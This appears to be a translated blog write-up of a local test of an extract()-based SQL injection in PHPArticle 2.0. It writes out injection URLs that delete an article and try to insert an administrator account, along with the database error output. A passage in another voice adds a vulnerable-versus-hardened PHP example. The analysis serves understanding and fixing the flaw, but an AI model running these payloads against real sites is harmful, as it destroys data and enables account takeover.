PHPArticle 2.0 Injection Vulnerability Test Analysis

xiaoxiao2021-03-06  41

PHPArticle is the best article system written in PHP, and so far it seems to have no record of being compromised. When I was learning PHP I read this article system's code; it felt similar to vBB, and I also analyzed it carefully and found no holes. Later, once I had a good grasp of PHP, I never went back to analyze it again. It always felt very safe to me.

Some time ago xiaohua told me that PHPArticle has a variable that is never initialized. I looked at it: I could not use this variable to construct anything, although it affects every page. It is harmful, but I had no way to get anything meaningful out of it; simple destruction, however, is easy. Hey, I finally understand that destruction is simpler than construction.

The beginning of the /global.php file reads like this:

In the /admin/configs/setting.php file, the variable $configuration is an array holding the configuration parameters of the whole article system. To reduce the number of queries, the configuration information from the database is placed in this file as well, which naturally makes things faster. That is all perfectly normal, but one line of code is enough to make PHPArticle's data disappear in an instant.

extract($configuration, EXTR_OVERWRITE);

The PHP manual describes the extract() function as follows:

int extract(array $var_array [, int $extract_type [, string $prefix]])

This function imports variables from an array into the current symbol table. It takes the array var_array as its argument and uses each key as a variable name and the corresponding value as the variable's value. For each key/value pair it creates a variable in the current symbol table, subject to the extract_type and prefix parameters.

Note: Since version 4.0.5, the number of variables extracted is returned.

Note: EXTR_IF_EXISTS and EXTR_PREFIX_IF_EXISTS were introduced in version 4.2.0.

Note: EXTR_REFS was introduced in version 4.3.0.

extract() checks whether each key is a valid variable name and also checks for collisions with variable names already in the symbol table. How invalid or numeric keys and collisions are treated is determined by the extract_type parameter, which can be one of the following values:

EXTR_OVERWRITE: if there is a collision, overwrite the existing variable.

Obviously, any variable can be overwritten here, even system variables such as $_GET and $_POST. I really don't understand why the author explicitly chose EXTR_OVERWRITE.

The most critical variable is $db_prefix, defined in admin/config.php, which is the table prefix. This is the most useful one, because every query in PHPArticle uses this variable. On the surface this must lead to SQL injection, but the conditions are extremely harsh: starting from the table prefix, a complete SQL query has to be built and the rest of the original statement commented out. Oh, maybe load_file or INTO OUTFILE is still possible, happiness~~ In practice it does not go that smoothly. For clearer testing I set a variable $sql for every SQL query and output it on the system's home page, to see what the first SQL statement is. If it is a SELECT, it can be injected and a lot of useful information obtained. Even better, if it is an INSERT, a statement can be constructed directly to insert an administrator; if it is an UPDATE, the user I registered can be updated into the administrator group; if it is a DELETE, any data can be deleted. The statement that was output is "delete from pa_session WHERE expiry < 1103398532 11111111", as shown:
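To make the chain concrete, here is an added example of my own (a model, not PHPArticle's source) of the pattern the article describes: a request-supplied array key reaching $configuration before setting.php fills it, then extract() with EXTR_OVERWRITE replacing the $db_prefix that admin/config.php set, beside a hardened version. It assumes register_globals-style population of $configuration is simulated by passing the request array in, and the function names are my own.

```php
<?php
// Added example, not PHPArticle's code. $request stands in for what
// register_globals would have created from ?configuration[db_prefix]=...

// --- Vulnerable model of global.php -----------------------------------------
function buildSessionQueryVulnerable(array $request, $now)
{
    // admin/config.php defines the real table prefix.
    $db_prefix = 'pa_';

    // Because setting.php never did $configuration = array() first, a
    // request-supplied $configuration survives and setting.php only adds
    // its own keys on top of it.
    $configuration = isset($request['configuration']) ? $request['configuration'] : array();
    $configuration['sitename'] = 'PHPArticle';   // what setting.php contributes

    // The one line the article points at: an attacker-supplied 'db_prefix'
    // key now overwrites the $db_prefix from admin/config.php.
    extract($configuration, EXTR_OVERWRITE);

    return "DELETE FROM {$db_prefix}session WHERE expiry < " . (int) $now;
}

// --- Hardened model ---------------------------------------------------------
function buildSessionQueryHardened(array $request, $now)
{
    $db_prefix = 'pa_';

    // 1. Always start from an empty array so nothing from the request leaks in
    //    ($request is deliberately never consulted for configuration).
    $configuration = array();
    $configuration['sitename'] = 'PHPArticle';

    // 2. Never let extract() clobber variables that already exist.
    extract($configuration, EXTR_SKIP);

    // 3. Defence in depth: a table prefix can only ever be a plain identifier,
    //    so anything like "pa_article where articleid=1/*" is rejected here.
    if (!preg_match('/^[A-Za-z0-9_]{1,32}$/', $db_prefix)) {
        throw new RuntimeException('invalid table prefix');
    }

    return "DELETE FROM {$db_prefix}session WHERE expiry < " . (int) $now;
}

// Constructed request mirroring the article's first test (configuration[db_prefix]=angel).
$demo = array('configuration' => array('db_prefix' => 'angel'));
echo buildSessionQueryVulnerable($demo, 1104152890), "\n";
echo buildSessionQueryHardened($demo, 1104152890), "\n";
```

The vulnerable function yields a query against angelsession, exactly the table name in the error page below, while the hardened one keeps pa_session regardless of the request.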

Very annoying: if this DELETE statement is wrong, the MySQL error message is displayed and the running program stops, so the next SQL statement can never be executed. Annoying. And PHPArticle's error handling is very good: there is no way to get the physical path of the web root, and if the current user is not an administrator, not even the MySQL error message can be seen. I tested locally as an administrator, so MySQL's error information was returned to the screen, which makes the test easier. Let's construct a complete DELETE statement and see; after it succeeds, the next SQL query should continue to execute. I submit:

http://localhost/phparticle/global.php?configuration[db_prefix]=angel

The result returned:

PHPArticle
--------------------------------------------------------------------------------
Database error: SQL invalid: delete from angelsession where expiry < 1104152890
MySQL error description: Table 'article20.angelsession' doesn't exist
MySQL error number: 1146
Date: 2004-12-27 @ 21:08
Script: http://localhost/phparticle/global.php?configuration[db_prefix]=angel
Referer:
Please try to refresh your browser; if it still does not display normally, please contact the administrator.

Wrong, the table does not exist, but the database name has already come out: it is article20. Of course, in a real deployment this information is not visible, because PHPArticle has a fairly complete session check: no matter which page you browse or refresh, the session table is operated on first. Deleting the user's session, updating the session and querying the session all happen, because user login, online users and user status all rely on the session records. With this understood, start constructing a complete DELETE statement. Let's look at the next step:

http://localhost/phparticle/global.php?configuration[db_prefix]=pa_article where articleid=1/*

It returns:

PHPArticle
--------------------------------------------------------------------------------
Database error: SQL invalid: SELECT COUNT(DISTINCT ipaddress) AS total FROM pa_article where articleid=1/*session WHERE expiry > 1104153004
MySQL error description: Unknown column 'ipaddress' in 'field list'
MySQL error number: 1054
Date: 2004-12-27 @ 21:10
Script: http://localhost/phparticle/global.php?configuration[db_prefix]=pa_article%20where%20articleid=1/*
Referer:
Please try to refresh your browser; if it still does not display normally, please contact the administrator.

PHPArticle
--------------------------------------------------------------------------------
Database error: SQL invalid: INSERT INTO pa_article where articleid=1/*session (sessionid, expiry, value, userid, ipaddress, useragent, location, lastact) VALUES ('A9FDC1B9D7E37B92686FB46486B41D20', 1104154444, 'pauserinfo|a:1:{s:14:\"timezoneoffset\";s:1:\"8\";}', '', '127.0.0.1', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Maxthon; .NET CLR 1.1.4322)', '/phparticle/global.php?configuration[db_prefix]=pa_article%20where%20articleid=1/*', '1104153004')
MySQL error description: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'where articleid=1/*session (sessionid, expiry, value, userid, ipaddr
MySQL error number: 1064
Date: 2004-12-27 @ 21:10
Script: http://localhost/phparticle/global.php?configuration[db_prefix]=pa_article%20where%20articleid=1/*
Referer:
Please try to refresh your browser; if it still does not display normally, please contact the administrator.

Warning: Unknown(): A session is active. You cannot change the session module's ini settings at this time. in Unknown on line 0

Look at the article system: the article has been successfully deleted. But SQL execution stopped at the SELECT, and the error message terminated the program before the next SQL query could run; still, the error page shows that the INSERT statement was also executed with our parameters, as shown:

What about constructing the INSERT statement directly to add an administrator?

http://localhost/phparticle/global.php?configuration[db_prefix]=pa_user VALUES (NULL, CHAR(110, 97, 109, 101), 1, CHAR(102, 52, 102, 48, 54, 56, 101, 55, 49, 101, 48, 100, 56, 55, 98, 102, 48, 97, 100, 53, 49, 101, 54, 50, 49, 52, 97, 98, 56, 52, 101, 57), 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 8);/*

The result came back; it seems this path does not work, because the first SQL query already errors and execution is terminated.

PHPArticle
--------------------------------------------------------------------------------
Database error: SQL invalid: delete from pa_user VALUES (NULL, CHAR(110, 97, 109, 101), 1, CHAR(102, 52, 102, 48, 54, 56, 101, 55, 49, 101, 48, 100, 56, 55, 98, 102, 48, 97, 100, 53, 49, 101, 54, 50, 49, 52, 97, 98, 56, 52, 101, 57), 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 8);/*session WHERE expiry < 1104153372
MySQL error description: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'VALUES (NULL, CHAR(110, 97, 109, 101), 1, 25, 56, 101
MySQL error number: 1064
Date: 2004-12-27 @ 21:16
Script: http://localhost/phparticle/global.php?configuration[db_prefix]=pa_user%20values%20(NULL, CHAR(110, 97, 109, 101), 1, CHAR(102, 52, 102, 48, 54, 56, 101, 55, 49, 101, 48, 100, 56, 55, 98, 102, 48, 97, 100, 53, 49, 101, 54, 50, 49, 52, 97, 98, 56, 52, 101, 57), 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 8);/*
Referer:
Please try to refresh your browser; if it still does not display normally, please contact the administrator.

At this point I can only submit, helplessly:

http://localhost/phparticle/global.php?configuration[db_prefix]=pa_article/*

That ends this test.

When reposting, please credit the original address: https://www.9cbs.com/read-75486.html
